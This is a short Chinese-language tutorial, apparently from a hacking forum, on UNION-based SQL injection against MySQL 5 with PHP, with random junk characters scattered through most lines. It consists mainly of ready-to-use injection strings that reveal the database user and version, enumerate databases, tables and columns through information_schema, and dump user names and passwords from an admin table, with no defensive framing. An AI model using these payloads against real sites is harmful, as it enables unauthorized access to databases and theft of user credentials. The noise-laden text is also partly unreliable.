. N! X6 x% Z* n b' M' H
教程内容:Mysql 5+php 注入* N5 ^$ ~% w' I0 v
4 ~7 n& X) W4 G9 I" ^ l8 q7 G3 T- g# {+ i
, D, D6 u# y. @& a一.查看MYSQL基本信息(库名,版本,用户)+ s# Q# v3 }% k8 h
( M& T9 ^- Y3 f* `" \0 G9 J
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
" Y" s q! e* T$ a- f) {2 j& b. a, @6 n0 C' n! P
二.查数据库
- z1 \& R: H$ A y
; \3 r- p4 h. M9 z2 Sand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*6 i2 U) w4 }$ b+ M0 e3 u D
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。$ E& B& C. p# @; g
6 ^- P0 L' F+ @) Q: [; o
三.暴表' h5 P' S- W2 A8 N* E; D1 d2 c
) F |& c. m5 P0 I3 y
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
( I: ~2 t9 x. c C+ }8 g( a
7 W# B0 T1 m0 J& k+ l0 y, ?limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。: t9 c A: f" T7 x: j! \! N
6 P: R1 K8 u+ d: U$ z2 @
四.暴字段7 A3 l3 O$ O$ S; A/ j0 r
" P7 Q$ }, O; j: [# x$ U" c) tand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
! m9 }* `% [. Q2 |
4 @: w! j0 V2 l0 u# ^6 Alimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。9 A9 n" o$ A) t6 \
0 L! v& F J" [% [6 x5 a) h- i) ]
五.暴数据
: D9 B% A5 `7 o; H7 G- M0 H( t: n
. F0 K6 g& C- yand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*+ K( q5 _+ A8 g9 D! c8 q
' S2 s% b0 D% P( s( A8 t5 u! b
" \ V! ?$ f) Q; F- b
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
, u$ o* q, p( Z |